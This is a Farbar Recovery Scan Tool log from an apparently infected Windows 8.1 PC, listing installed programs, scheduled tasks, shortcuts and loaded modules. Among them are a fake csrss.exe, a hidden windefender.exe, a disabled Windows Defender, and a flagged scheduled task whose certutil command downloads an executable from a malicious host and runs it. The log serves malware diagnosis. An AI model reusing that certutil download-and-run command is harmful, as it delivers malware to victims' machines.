2019-02-05 00:50 - 2019-02-05 00:50 - 000126464 _____ () C:\Users\Stanley\AppData\Local\noah.dat
2019-02-05 00:50 - 2019-02-05 00:49 - 001632256 _____ (TODO: <Company name>) C:\Users\Stanley\AppData\Local\Ran-Lex.exe
2019-02-05 00:50 - 2019-02-05 00:50 - 002037348 _____ () C:\Users\Stanley\AppData\Local\Ran-Lex.tst
2018-06-02 10:15 - 2018-06-02 10:15 - 000007611 _____ () C:\Users\Stanley\AppData\Local\Resmon.ResmonCfg
2019-02-05 00:49 - 2019-02-05 01:33 - 000722944 _____ () C:\Users\Stanley\AppData\Local\sham.db
2019-02-05 00:50 - 2019-02-05 00:50 - 000032038 _____ () C:\Users\Stanley\AppData\Local\uninstall_temp.ico

Files to move or delete:
====================
C:\Windows\rss\csrss.exe
C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe


Some files in TEMP:
====================
2019-02-04 22:34 - 2019-02-05 01:46 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\syncios.exe
2019-01-30 07:52 - 2019-01-30 07:52 - 000000000 ____D () C:\Users\RoseGold\AppData\Local\Temp\SynciosDeviceService.exe
2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\syncios.exe
2019-02-10 23:14 - 2019-02-10 23:14 - 000000000 ____D () C:\Users\Stanley\AppData\Local\Temp\SynciosDeviceService.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\dllhost.exe => File is digitally signed
C:\Windows\SysWOW64\dllhost.exe => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-01-31 16:49

==================== End of FRST.txt ============================

ADDITION.TXT

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10.02.2019 01
Ran by #Strazzo.RoseGold## (12-02-2019 07:10:51)
Running from C:\Users\Stanley\Downloads\FRST
Windows 8.1 Enterprise (Update) (X64) (2018-05-03 16:52:27)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

#Strazzo.RoseGold## (S-1-5-21-1692593245-3285590566-2148222763-1001 - Administrator - Enabled) => C:\Users\Stanley
Administrator (S-1-5-21-1692593245-3285590566-2148222763-500 - Administrator - Enabled) => C:\Users\Administrator
Guest (S-1-5-21-1692593245-3285590566-2148222763-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1692593245-3285590566-2148222763-1003 - Limited - Disabled)
RoseGold (S-1-5-21-1692593245-3285590566-2148222763-1004 - Administrator - Enabled) => C:\Users\RoseGold

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.)
1.1.3 (HKLM-x32\...\{A4046FE1-986B-4463-B4DD-CFA473A7056B}_is1) (Version:  - PDFZilla)
7-Zip 15.14 (HKLM-x32\...\7-Zip) (Version: 15.14 - Igor Pavlov)
Ability Mail Server 4.2.6 (HKLM-x32\...\Ability Mail Server 4_is1) (Version:  - Code Crafters Software Limited)
Adobe Flash Player 20 ActiveX & Plugins 64-bit (HKLM\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated)
AIMP (HKLM-x32\...\AIMP) (Version: v4.00.1687, 18.01.2016 - AIMP DevTeam)
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
BlackBerry 10 Desktop Software (Blend, Link, Drivers) (HKLM-x32\...\{c33e77db-89b5-4abf-a1d1-97f8b35347e1}) (Version: 1.2.0.52 - BlackBerry)
BlackBerry Blend (HKLM-x32\...\{1DA42C01-4ED2-4B4E-B90C-18FCBA12FC41}) (Version: 1.2.0.50 - BlackBerry Ltd.) Hidden
BlackBerry Communication Drivers (HKLM-x32\...\{46CD5A63-0C1F-45C3-B643-CA87A17275C0}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Device Drivers (HKLM-x32\...\{1F6490E5-7540-426D-BC1E-EB57B0BF0C38}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden
BlackBerry Link (HKLM-x32\...\{C42468F9-9812-4550-A54B-5DDB062EB10F}) (Version: 1.2.4.39 - BlackBerry) Hidden
BlackBerry Link Remover (HKLM-x32\...\{44D65CAB-1BC8-47B7-BF5B-3EB8B6BB0276}) (Version: 1.2.4.0 - BlackBerry Ltd.) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CloudNet (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
DriverPack Easy Search (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\DriverPack Easy Search) (Version: 1.0 - DriverPack Solution)
FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 7.0.1.0 - FlashPeak Inc.)
GLO 3G PLUS (HKLM-x32\...\GLO 3G PLUS) (Version: 11.300.05.03.251 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 71.0.3578.98 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden
HP Hotkey Support (HKLM-x32\...\{6E7401DB-B722-4428-BE94-DD4740CF6464}) (Version: 5.0.28.1 - Hewlett-Packard Company)
HP Software Framework (HKLM-x32\...\{886D1141-25E5-431F-8326-C3DB6FFCCAF0}) (Version: 4.0.96.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{930B5F2B-8DB9-42F4-90E4-5D3DC30541C3}) (Version: 12.10.49.21 - HP Inc.)
HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.13 - HP Inc.)
iCloud (HKLM\...\{05D97028-FD26-4A3D-BADC-D1CA2E9F1214}) (Version: 7.10.0.9 - Apple Inc.)
IncrediMail (HKLM-x32\...\{35505AE1-27E2-4206-B3BF-58771803B8D0}) (Version: 6.6.0.5344 - IncrediMail) Hidden
IncrediMail 2.5 (HKLM-x32\...\IncrediMail) (Version: 6.6.0.5344 - IncrediMail Ltd.)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
KeePass Password Safe 2.39.1 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.39.1 - Dominik Reichl)
K-Lite Codec Pack 13.8.2 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 13.8.2 - KLCP)
LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation)
Malwarebytes version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM-x32\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM-x32\...\M2833941) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM-x32\...\M979906) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version:  - )
Microsoft .NET Framework 1.1 SP1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
OpenVPN 2.4.6-I602  (HKLM\...\OpenVPN) (Version: 2.4.6-I602 - OpenVPN Technologies, Inc.)
Opera Stable 57.0.3098.116 (HKLM-x32\...\Opera 57.0.3098.116) (Version: 57.0.3098.116 - Opera Software)
PowerISO (HKLM-x32\...\PowerISO) (Version: 7.2 - Power Software Ltd)
Registry Recycler (HKLM-x32\...\Registry Recycler_is1) (Version: 0.9.3.1 - Developer Tribe (Pvt) Ltd.)
SAM CoDeC Pack (HKLM\...\SAM CoDeC Pack) (Version: 5.85 - www.SamLab.ws)
Skype version 8.38 (HKLM-x32\...\Skype_is1) (Version: 8.38 - Skype Technologies S.A.)
SmarterMail Sync for Outlook 2003 and above (HKLM-x32\...\{6567F265-62EC-4BA9-9629-6B483B608854}) (Version: 1.0 - Smarter Tools)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.65 - Synaptics Incorporated)
Syncios 6.5.8 (HKLM-x32\...\Syncios) (Version: 6.5.8 - Anvsoft)
Syncios Data Recovery 2.0.5 (HKLM-x32\...\06d5deef-8cb6-52ed-a43f-f181f836384a) (Version: 2.0.5 - Syncios Data Recovery)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
uTorrent Web (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\utweb) (Version: 0.16.0 - BitTorrent, Inc.)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN)
Web Companion (HKLM-x32\...\{962c09bc-ffdf-415f-8554-7bf56c52618b}) (Version: 4.5.1957.3838 - Lavasoft)
WhatsApp (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\WhatsApp) (Version: 0.3.1409 - WhatsApp)
WinAce Archiver (HKLM-x32\...\WinAce Archiver) (Version: 2.69 - e-merge GmbH)
Windows Driver Package - Google Corporation (androidusb) USB  (11/11/2015 1.0.0020.00000) (HKLM\...\964D20A0C219E8C327639DBA3C1FD49434216922) (Version: 11/11/2015 1.0.0020.00000 - Google Corporation)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass  (11/11/2015 2.0.0020.00000) (HKLM\...\B02D55DC05C888A284041A2F8A294C0D557A218C) (Version: 11/11/2015 2.0.0020.00000 - Google, Inc.)
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (ssudmdm) Modem  (08/24/2016 2.12.4.0) (HKLM\...\B8C7DCAC7E5C993BD8367E5832C6C99E0B248D7A) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
Windows Driver Package - SAMSUNG Electronics Co., Ltd.  (WinUSB) AndroidUsbDeviceClass  (08/24/2016 2.12.4.0) (HKLM\...\609138CA03F1F9B54E04FA4DAB7C0C3F28DE9464) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. )
WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Stanley\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2014-04-21] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers1-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll [2018-05-04] (Artem Izmaylov -> AIMP DevTeam)
ContextMenuHandlers1-x32: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-01-15] (Apple Inc. -> Apple Inc.)
ContextMenuHandlers1-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers4-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll [2018-05-04] (Artem Izmaylov -> AIMP DevTeam)
ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers4-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2015-06-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov)
ContextMenuHandlers6-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd)
ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {019A414B-EDCF-464E-A4FF-6E1780935AB0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (HP Inc. -> HP Inc.)
Task: {0201CCC7-6501-45DB-A996-1FE7FF3DA309} - System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe (Hewlett-Packard Company -> HP Inc.)
Task: {121858E1-B466-49DB-ABBF-BE0AD32980CE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001UA => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {15570572-319C-48BD-AD3A-A7BCC7852BC7} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe () [File not signed] <==== ATTENTION
Task: {28881E47-3230-4F62-9776-67E7151C7EAD} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe () [File not signed]
Task: {3BA5F14D-A722-4A2B-BB6D-E5E747D3F491} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: {44D766A4-890D-4187-8209-27B0E5320737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe (Apple Inc. -> Apple Inc.)
Task: {4759FCE5-417F-4558-A8AE-4C124D2B53A7} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated)
Task: {4B307496-C19B-4F0D-8A51-8EA93C3082D4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {567829EB-0803-46FA-8139-6EAAC8AC96FA} - System32\Tasks\{E2C35618-CCBE-4D12-A910-891C3DC29DF9} => C:\Windows\system32\pcalua.exe -a "C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {766C85C7-D024-4937-AD2A-1D565A0EFE0E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {7F232E68-AE32-41F8-B98F-689DC0D3D5E5} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe (HP Inc. -> HP Inc.)
Task: {8292C123-B9AC-4784-B31B-420E6D1FFE44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe (HP Inc. -> HP Inc.)
Task: {83DEE68E-A3DD-4AE5-9A83-06EC0861E6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.)
Task: {B5D3DB14-5265-4538-9CB9-FDAA4A1D4D8B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.)
Task: {B8341303-B899-411B-B0C7-90BB369E5C8C} - System32\Tasks\Opera scheduled Autoupdate 1525449700 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software)
Task: {C28388CC-478E-460F-BC73-1BB706E4CB8B} - System32\Tasks\{C2F55618-3604-4E37-AF83-6C71B337894D} => C:\Windows\system32\pcalua.exe -a C:\Users\Stanley\Downloads\Programs\ability-mail-server\setup.exe -d C:\Users\Stanley\Downloads\Programs\ability-mail-server
Task: {C3FE92DB-969F-447D-9F05-1E0093D0326E} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://delaker.info/app/app.exe C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\#Strazzo.RoseGold##\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
Task: {DA1D9517-63D2-4DD4-B496-824CB060ABE0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe (HP Inc. -> HP Inc.)
Task: {DCD49F79-E1DD-40AB-8653-E3D1BA2C9E1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E6E376AE-3FCC-45F3-89EB-014031777959} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.)
Task: {E9BDD47D-D63C-4F59-8B54-0B30B7E5D664} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001Core => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe+HPCeeScheduleFor#Strazzo.RoseGold## (null)!STRAZZOWEEZY\#Strazzo.Ros
Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe/update!STRAZZOWEEZY\#Strazzo.Ros <==== ATTENTION

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Stanley\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co

ShortcutWithArgument: C:\Users\Stanley\Desktop\BELIEVE WORKGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Stanley\Desktop\Person 1 - Chrome (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\Stanley\Desktop\Person 1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default"
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779
ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.Почта.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl
ShortcutWithArgument: C:\Users\Stanley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\WORKHARDGROUP 2 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"
ShortcutWithArgument: C:\Users\Stanley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\WORKHARDGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
ShortcutWithArgument: C:\Users\Stanley\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\225bb61db2f318c1\WORKHARDGROUP 3 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3"

==================== Loaded Modules (Whitelisted) ==============

2018-05-16 02:59 - 2018-05-16 02:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000226208 _____ () C:\Program Files\OpenVPN\bin\liblzo2-2.dll
2018-04-26 17:24 - 2018-04-26 17:24 - 000127488 _____ () C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll
2015-06-02 05:00 - 2015-06-02 05:00 - 000102912 _____ () C:\Windows\System32\IccLibDll_x64.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll
2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll
 -  - 000000000 ____H () C:\Windows\windefender.exe
2015-05-26 16:46 - 2015-05-26 16:46 - 000094208 _____ () C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\libxpmux.dll
2018-04-12 18:06 - 2019-02-02 19:04 - 001837672 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll
2019-02-09 01:00 - 2019-02-02 19:04 - 002392416 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll
2019-02-09 01:00 - 2019-02-02 19:04 - 000097840 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keytar\build\Release\keytar.node
2019-02-09 01:00 - 2019-02-02 19:04 - 000219696 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\Release\electron-ssid.node
2019-02-09 01:00 - 2019-02-02 19:04 - 000081768 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\desktop-idle\build\Release\desktopIdle.node
